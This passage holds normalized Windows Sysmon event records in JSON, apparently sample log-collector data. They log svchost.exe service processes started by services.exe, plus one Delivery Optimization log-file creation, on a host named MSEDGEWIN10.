22:19:17.764\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00106b420100}\"},{\"Name\":\"ProcessId\",\"text\":\"2056\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\DeliveryOptimization\\\\Logs\\\\dosvc.20200425_221917_750.etl\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:17.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\microsoft\\windows\\deliveryoptimization\\logs\\dosvc.20200425_221917_750.etl", "object.name": "dosvc.20200425_221917_750.etl", "object.path": "c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\microsoft\\windows\\deliveryoptimization\\logs\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:17.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b765-5ea4-0000-00106b420100", "subject.process.id": "2056", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.764Z", "type": "raw", "uuid": "f8002c1b-a361-4a83-ad22-f8dfb6a5afb6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4732530Z\"},\"EventRecordID\":\"27565\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.709\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010aa430100}\"},{\"Name\":\"ProcessId\",\"text\":\"2076\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetworkFirewall -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010aa430100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2076", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.709Z", "type": "raw", "uuid": "32a9d070-2b4c-4b27-afcc-bf150c798a0b"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.1985843Z\"},\"EventRecordID\":\"27554\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.652\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00100b390100}\"},{\"Name\":\"ProcessId\",\"text\":\"1552\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00100b390100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1552", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.652Z", "type": "raw", "uuid": "b96c72ff-90d2-424f-83fa-c0defe83eaa2"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.1966161Z\"},\"EventRecordID\":\"27553\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.650\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00107a380100}\"},{\"Name\":\"ProcessId\",\"text\":\"1440\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00107a380100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1440", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.650Z", "type": "raw", "uuid": "a1218116-4848-45d8-b901-d0a2fe6b932b"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6526907Z\"},\"EventRecordID\":\"27545\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.585\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010572d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1996\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010572d0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1996", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.585Z", "type": "raw", "uuid": "495f87c3-592a-44f3-86ec-0e565eac50bb"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6458706Z\"},\"EventRecordID\":\"27541\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.554\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010be260100}\"},{\"Name\":\"ProcessId\",\"text\":\"1936\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010be260100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1936", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.554Z", "type": "raw", "uuid": "6d74d78b-23b3-4b8c-aecd-f76b5dae7056"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6438375Z\"},\"EventRecordID\":\"27537\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 